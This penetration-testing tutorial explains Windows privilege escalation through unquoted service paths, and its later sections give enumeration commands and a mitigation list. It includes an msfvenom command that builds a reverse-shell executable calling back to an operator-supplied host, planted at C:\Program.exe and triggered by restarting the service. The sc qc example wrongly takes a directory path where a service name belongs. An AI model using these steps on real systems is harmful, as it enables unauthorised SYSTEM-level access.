Attacks - Windows Privilege Escalation

Service Exploits - Unquoted Service Path

Unquoted Service Path

Unquoted Service Path is a common misconfiguration in Windows services where the executable’s file path is not enclosed in quotes. If the path contains spaces and lacks quotes, attackers can exploit this to execute malicious programs by placing executables in specific locations along the path.

How It Works

  1. When a service’s binary path contains spaces and is not enclosed in quotes, Windows tries to locate the executable by interpreting the path in segments.
  2. For example, if the binary path is:
C:\Program Files\Service Directory\service.exe

Without quotes, Windows will check:

  • C:\Program.exe
  • C:\Program Files\Service.exe
  • C:\Program Files\Service Directory\service.exe

If an attacker can place a malicious executable (Program.exe or Service.exe) in one of the preceding locations and the service runs with high privileges (e.g., SYSTEM), the malicious file will execute instead.

Steps to Exploit Unquoted Service Path

1. Enumerate Services

Identify services with unquoted paths using sc.exe or PowerShell:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Look for paths without quotes, especially those containing spaces.

2. Verify Permissions

Ensure you can write to a directory along the service’s path. Use icacls to check permissions:

icacls "C:\Program Files\"

Running the command will provide an output similar to this:

C:\Program Files\Unquoted Path Service\
    BUILTIN\Administrators:(F)
    NT AUTHORITY\SYSTEM:(F)
    BUILTIN\Users:(RX)
    NT AUTHORITY\Authenticated Users:(M)
  • BUILTIN\Administrators:(F): Full control for administrators.
  • NT AUTHORITY\SYSTEM:(F): Full control for the SYSTEM user.
  • BUILTIN\Users:(RX): Read and execute permissions for standard users.
  • NT AUTHORITY\Authenticated Users:(M): Modify permissions for authenticated users.

If a low-privileged user or group (e.g., BUILTIN\Users or Everyone) has Modify (M) or Write (W) permissions on the directory, you can exploit it by adding a malicious executable.

or with accesschk.exe:

accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

Use the following command to find the START_TYPE, SERVICE_START_NAME and BINARY_PATH_NAME:

sc qc "C:\Program Files\Unquoted Path Service\"

3. Create a Malicious Executable

Generate a malicious payload (e.g., using msfvenom or msfconsole) and name it to match the segment you want to exploit:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f exe -o Program.exe

Place the malicious executable in the writable directory.

4. Restart the Service

Restart the vulnerable service to trigger the exploit:

net stop <service-name>
net start <service-name>

Upon restarting, the malicious executable will execute with the service’s privileges.

Mitigation

To prevent this vulnerability:

  • Always enclose service binary paths in quotes.
  • Regularly audit services for unquoted paths:
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\"
  • Limit write permissions on directories along the service paths.